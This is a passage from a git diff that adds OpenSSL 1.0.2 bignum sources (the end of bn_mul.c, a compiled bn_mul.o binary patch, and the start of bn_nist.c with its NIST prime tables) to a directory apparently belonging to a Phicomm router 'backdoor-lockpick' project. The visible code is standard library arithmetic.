+    bn_check_top(a);
+    bn_check_top(b);
+    bn_check_top(r);
+
+    al = a->top;
+    bl = b->top;
+
+    if ((al == 0) || (bl == 0)) {
+        BN_zero(r);
+        return (1);
+    }
+    top = al + bl;
+
+    BN_CTX_start(ctx);
+    if ((r == a) || (r == b)) {
+        if ((rr = BN_CTX_get(ctx)) == NULL)
+            goto err;
+    } else
+        rr = r;
+    rr->neg = a->neg ^ b->neg;
+
+#if defined(BN_MUL_COMBA) || defined(BN_RECURSION)
+    i = al - bl;
+#endif
+#ifdef BN_MUL_COMBA
+    if (i == 0) {
+# if 0
+        if (al == 4) {
+            if (bn_wexpand(rr, 8) == NULL)
+                goto err;
+            rr->top = 8;
+            bn_mul_comba4(rr->d, a->d, b->d);
+            goto end;
+        }
+# endif
+        if (al == 8) {
+            if (bn_wexpand(rr, 16) == NULL)
+                goto err;
+            rr->top = 16;
+            bn_mul_comba8(rr->d, a->d, b->d);
+            goto end;
+        }
+    }
+#endif                          /* BN_MUL_COMBA */
+#ifdef BN_RECURSION
+    if ((al >= BN_MULL_SIZE_NORMAL) && (bl >= BN_MULL_SIZE_NORMAL)) {
+        if (i >= -1 && i <= 1) {
+            /*
+             * Find out the power of two lower or equal to the longest of the
+             * two numbers
+             */
+            if (i >= 0) {
+                j = BN_num_bits_word((BN_ULONG)al);
+            }
+            if (i == -1) {
+                j = BN_num_bits_word((BN_ULONG)bl);
+            }
+            j = 1 << (j - 1);
+            assert(j <= al || j <= bl);
+            k = j + j;
+            t = BN_CTX_get(ctx);
+            if (t == NULL)
+                goto err;
+            if (al > j || bl > j) {
+                if (bn_wexpand(t, k * 4) == NULL)
+                    goto err;
+                if (bn_wexpand(rr, k * 4) == NULL)
+                    goto err;
+                bn_mul_part_recursive(rr->d, a->d, b->d,
+                                      j, al - j, bl - j, t->d);
+            } else {            /* al <= j || bl <= j */
+
+                if (bn_wexpand(t, k * 2) == NULL)
+                    goto err;
+                if (bn_wexpand(rr, k * 2) == NULL)
+                    goto err;
+                bn_mul_recursive(rr->d, a->d, b->d, j, al - j, bl - j, t->d);
+            }
+            rr->top = top;
+            goto end;
+        }
+# if 0
+        if (i == 1 && !BN_get_flags(b, BN_FLG_STATIC_DATA)) {
+            BIGNUM *tmp_bn = (BIGNUM *)b;
+            if (bn_wexpand(tmp_bn, al) == NULL)
+                goto err;
+            tmp_bn->d[bl] = 0;
+            bl++;
+            i--;
+        } else if (i == -1 && !BN_get_flags(a, BN_FLG_STATIC_DATA)) {
+            BIGNUM *tmp_bn = (BIGNUM *)a;
+            if (bn_wexpand(tmp_bn, bl) == NULL)
+                goto err;
+            tmp_bn->d[al] = 0;
+            al++;
+            i++;
+        }
+        if (i == 0) {
+            /* symmetric and > 4 */
+            /* 16 or larger */
+            j = BN_num_bits_word((BN_ULONG)al);
+            j = 1 << (j - 1);
+            k = j + j;
+            t = BN_CTX_get(ctx);
+            if (al == j) {      /* exact multiple */
+                if (bn_wexpand(t, k * 2) == NULL)
+                    goto err;
+                if (bn_wexpand(rr, k * 2) == NULL)
+                    goto err;
+                bn_mul_recursive(rr->d, a->d, b->d, al, t->d);
+            } else {
+                if (bn_wexpand(t, k * 4) == NULL)
+                    goto err;
+                if (bn_wexpand(rr, k * 4) == NULL)
+                    goto err;
+                bn_mul_part_recursive(rr->d, a->d, b->d, al - j, j, t->d);
+            }
+            rr->top = top;
+            goto end;
+        }
+# endif
+    }
+#endif                          /* BN_RECURSION */
+    if (bn_wexpand(rr, top) == NULL)
+        goto err;
+    rr->top = top;
+    bn_mul_normal(rr->d, a->d, al, b->d, bl);
+
+#if defined(BN_MUL_COMBA) || defined(BN_RECURSION)
+ end:
+#endif
+    bn_correct_top(rr);
+    if (r != rr)
+        BN_copy(r, rr);
+    ret = 1;
+ err:
+    bn_check_top(r);
+    BN_CTX_end(ctx);
+    return (ret);
+}
+
+void bn_mul_normal(BN_ULONG *r, BN_ULONG *a, int na, BN_ULONG *b, int nb)
+{
+    BN_ULONG *rr;
+
+#ifdef BN_COUNT
+    fprintf(stderr, " bn_mul_normal %d * %d\n", na, nb);
+#endif
+
+    if (na < nb) {
+        int itmp;
+        BN_ULONG *ltmp;
+
+        itmp = na;
+        na = nb;
+        nb = itmp;
+        ltmp = a;
+        a = b;
+        b = ltmp;
+
+    }
+    rr = &(r[na]);
+    if (nb <= 0) {
+        (void)bn_mul_words(r, a, na, 0);
+        return;
+    } else
+        rr[0] = bn_mul_words(r, a, na, b[0]);
+
+    for (;;) {
+        if (--nb <= 0)
+            return;
+        rr[1] = bn_mul_add_words(&(r[1]), a, na, b[1]);
+        if (--nb <= 0)
+            return;
+        rr[2] = bn_mul_add_words(&(r[2]), a, na, b[2]);
+        if (--nb <= 0)
+            return;
+        rr[3] = bn_mul_add_words(&(r[3]), a, na, b[3]);
+        if (--nb <= 0)
+            return;
+        rr[4] = bn_mul_add_words(&(r[4]), a, na, b[4]);
+        rr += 4;
+        r += 4;
+        b += 4;
+    }
+}
+
+void bn_mul_low_normal(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n)
+{
+#ifdef BN_COUNT
+    fprintf(stderr, " bn_mul_low_normal %d * %d\n", n, n);
+#endif
+    bn_mul_words(r, a, n, b[0]);
+
+    for (;;) {
+        if (--n <= 0)
+            return;
+        bn_mul_add_words(&(r[1]), a, n, b[1]);
+        if (--n <= 0)
+            return;
+        bn_mul_add_words(&(r[2]), a, n, b[2]);
+        if (--n <= 0)
+            return;
+        bn_mul_add_words(&(r[3]), a, n, b[3]);
+        if (--n <= 0)
+            return;
+        bn_mul_add_words(&(r[4]), a, n, b[4]);
+        r += 4;
+        b += 4;
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_mul.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_mul.o
new file mode 100644
index 0000000000000000000000000000000000000000..1b11828d3829c0ca41311cc243077f2201a58db3
GIT binary patch
literal 11632
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_nist.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_nist.c
new file mode 100644
index 0000000..4a45404
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_nist.c
@@ -0,0 +1,1262 @@
+/* crypto/bn/bn_nist.c */
+/*
+ * Written by Nils Larsch for the OpenSSL project
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "bn_lcl.h"
+#include "cryptlib.h"
+
+#define BN_NIST_192_TOP (192+BN_BITS2-1)/BN_BITS2
+#define BN_NIST_224_TOP (224+BN_BITS2-1)/BN_BITS2
+#define BN_NIST_256_TOP (256+BN_BITS2-1)/BN_BITS2
+#define BN_NIST_384_TOP (384+BN_BITS2-1)/BN_BITS2
+#define BN_NIST_521_TOP (521+BN_BITS2-1)/BN_BITS2
+
+/* pre-computed tables are "carry-less" values of modulus*(i+1) */
+#if BN_BITS2 == 64
+static const BN_ULONG _nist_p_192[][BN_NIST_192_TOP] = {
+    {0xFFFFFFFFFFFFFFFFULL, 0xFFFFFFFFFFFFFFFEULL, 0xFFFFFFFFFFFFFFFFULL},
+    {0xFFFFFFFFFFFFFFFEULL, 0xFFFFFFFFFFFFFFFDULL, 0xFFFFFFFFFFFFFFFFULL},
+    {0xFFFFFFFFFFFFFFFDULL, 0xFFFFFFFFFFFFFFFCULL, 0xFFFFFFFFFFFFFFFFULL}
+};
+
+static const BN_ULONG _nist_p_192_sqr[] = {
+    0x0000000000000001ULL, 0x0000000000000002ULL, 0x0000000000000001ULL,
+    0xFFFFFFFFFFFFFFFEULL, 0xFFFFFFFFFFFFFFFDULL, 0xFFFFFFFFFFFFFFFFULL
+};
+
+static const BN_ULONG _nist_p_224[][BN_NIST_224_TOP] = {
+    {0x0000000000000001ULL, 0xFFFFFFFF00000000ULL,
+     0xFFFFFFFFFFFFFFFFULL, 0x00000000FFFFFFFFULL},
+    {0x0000000000000002ULL, 0xFFFFFFFE00000000ULL,
+     0xFFFFFFFFFFFFFFFFULL, 0x00000001FFFFFFFFULL} /* this one is
+                                                    * "carry-full" */
+};
+
+static const BN_ULONG _nist_p_224_sqr[] = {
+    0x0000000000000001ULL, 0xFFFFFFFE00000000ULL,
+    0xFFFFFFFFFFFFFFFFULL, 0x0000000200000000ULL,
+    0x0000000000000000ULL, 0xFFFFFFFFFFFFFFFEULL,
+    0xFFFFFFFFFFFFFFFFULL
+};
+
+static const BN_ULONG _nist_p_256[][BN_NIST_256_TOP] = {
+    {0xFFFFFFFFFFFFFFFFULL, 0x00000000FFFFFFFFULL,
+     0x0000000000000000ULL, 0xFFFFFFFF00000001ULL},
+    {0xFFFFFFFFFFFFFFFEULL, 0x00000001FFFFFFFFULL,
+     0x0000000000000000ULL, 0xFFFFFFFE00000002ULL},
+    {0xFFFFFFFFFFFFFFFDULL, 0x00000002FFFFFFFFULL,
+     0x0000000000000000ULL, 0xFFFFFFFD00000003ULL},
+    {0xFFFFFFFFFFFFFFFCULL, 0x00000003FFFFFFFFULL,
+     0x0000000000000000ULL, 0xFFFFFFFC00000004ULL},
+    {0xFFFFFFFFFFFFFFFBULL, 0x00000004FFFFFFFFULL,
+     0x0000000000000000ULL, 0xFFFFFFFB00000005ULL},
+};
+
+static const BN_ULONG _nist_p_256_sqr[] = {
+    0x0000000000000001ULL, 0xFFFFFFFE00000000ULL,
+    0xFFFFFFFFFFFFFFFFULL, 0x00000001FFFFFFFEULL,
+    0x00000001FFFFFFFEULL, 0x00000001FFFFFFFEULL,
+    0xFFFFFFFE00000001ULL, 0xFFFFFFFE00000002ULL
+};
+
+static const BN_ULONG _nist_p_384[][BN_NIST_384_TOP] = {
+    {0x00000000FFFFFFFFULL, 0xFFFFFFFF00000000ULL, 0xFFFFFFFFFFFFFFFEULL,
+     0xFFFFFFFFFFFFFFFFULL, 0xFFFFFFFFFFFFFFFFULL, 0xFFFFFFFFFFFFFFFFULL},
+    {0x00000001FFFFFFFEULL, 0xFFFFFFFE00000000ULL, 0xFFFFFFFFFFFFFFFDULL,
+     0xFFFFFFFFFFFFFFFFULL, 0xFFFFFFFFFFFFFFFFULL, 0xFFFFFFFFFFFFFFFFULL},
+    {0x00000002FFFFFFFDULL, 0xFFFFFFFD00000000ULL, 0xFFFFFFFFFFFFFFFCULL,
+     0xFFFFFFFFFFFFFFFFULL, 0xFFFFFFFFFFFFFFFFULL, 0xFFFFFFFFFFFFFFFFULL},
+    {0x00000003FFFFFFFCULL, 0xFFFFFFFC00000000ULL, 0xFFFFFFFFFFFFFFFBULL,
+     0xFFFFFFFFFFFFFFFFULL, 0xFFFFFFFFFFFFFFFFULL, 0xFFFFFFFFFFFFFFFFULL},
+    {0x00000004FFFFFFFBULL, 0xFFFFFFFB00000000ULL, 0xFFFFFFFFFFFFFFFAULL,
+     0xFFFFFFFFFFFFFFFFULL, 0xFFFFFFFFFFFFFFFFULL, 0xFFFFFFFFFFFFFFFFULL},
+};
+
+static const BN_ULONG _nist_p_384_sqr[] = {
+    0xFFFFFFFE00000001ULL, 0x0000000200000000ULL, 0xFFFFFFFE00000000ULL,
+    0x0000000200000000ULL, 0x0000000000000001ULL, 0x0000000000000000ULL,
+    0x00000001FFFFFFFEULL, 0xFFFFFFFE00000000ULL, 0xFFFFFFFFFFFFFFFDULL,
+    0xFFFFFFFFFFFFFFFFULL, 0xFFFFFFFFFFFFFFFFULL, 0xFFFFFFFFFFFFFFFFULL
+};
+
+static const BN_ULONG _nist_p_521[] =
+    { 0xFFFFFFFFFFFFFFFFULL, 0xFFFFFFFFFFFFFFFFULL,
+    0xFFFFFFFFFFFFFFFFULL, 0xFFFFFFFFFFFFFFFFULL,
+    0xFFFFFFFFFFFFFFFFULL, 0xFFFFFFFFFFFFFFFFULL,
+    0xFFFFFFFFFFFFFFFFULL, 0xFFFFFFFFFFFFFFFFULL,
+    0x00000000000001FFULL
+};
+
+static const BN_ULONG _nist_p_521_sqr[] = {
+    0x0000000000000001ULL, 0x0000000000000000ULL, 0x0000000000000000ULL,
+    0x0000000000000000ULL, 0x0000000000000000ULL, 0x0000000000000000ULL,
+    0x0000000000000000ULL, 0x0000000000000000ULL, 0xFFFFFFFFFFFFFC00ULL,
+    0xFFFFFFFFFFFFFFFFULL, 0xFFFFFFFFFFFFFFFFULL, 0xFFFFFFFFFFFFFFFFULL,
+    0xFFFFFFFFFFFFFFFFULL, 0xFFFFFFFFFFFFFFFFULL, 0xFFFFFFFFFFFFFFFFULL,
+    0xFFFFFFFFFFFFFFFFULL, 0x000000000003FFFFULL
+};
+#elif BN_BITS2 == 32
+static const BN_ULONG _nist_p_192[][BN_NIST_192_TOP] = {
+    {0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFE, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF},
+    {0xFFFFFFFE, 0xFFFFFFFF, 0xFFFFFFFD, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF},
+    {0xFFFFFFFD, 0xFFFFFFFF, 0xFFFFFFFC, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF}
+};
+
+static const BN_ULONG _nist_p_192_sqr[] = {
+    0x00000001, 0x00000000, 0x00000002, 0x00000000, 0x00000001, 0x00000000,
+    0xFFFFFFFE, 0xFFFFFFFF, 0xFFFFFFFD, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF
+};
+
+static const BN_ULONG _nist_p_224[][BN_NIST_224_TOP] = {
+    {0x00000001, 0x00000000, 0x00000000, 0xFFFFFFFF,
+     0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF},
+    {0x00000002, 0x00000000, 0x00000000, 0xFFFFFFFE,
+     0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF}
+};
+
+static const BN_ULONG _nist_p_224_sqr[] = {
+    0x00000001, 0x00000000, 0x00000000, 0xFFFFFFFE,
+    0xFFFFFFFF, 0xFFFFFFFF, 0x00000000, 0x00000002,
+    0x00000000, 0x00000000, 0xFFFFFFFE, 0xFFFFFFFF,
+    0xFFFFFFFF, 0xFFFFFFFF
+};
+
+static const BN_ULONG _nist_p_256[][BN_NIST_256_TOP] = {
+    {0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0x00000000,
+     0x00000000, 0x00000000, 0x00000001, 0xFFFFFFFF},
+    {0xFFFFFFFE, 0xFFFFFFFF, 0xFFFFFFFF, 0x00000001,
+     0x00000000, 0x00000000, 0x00000002, 0xFFFFFFFE},
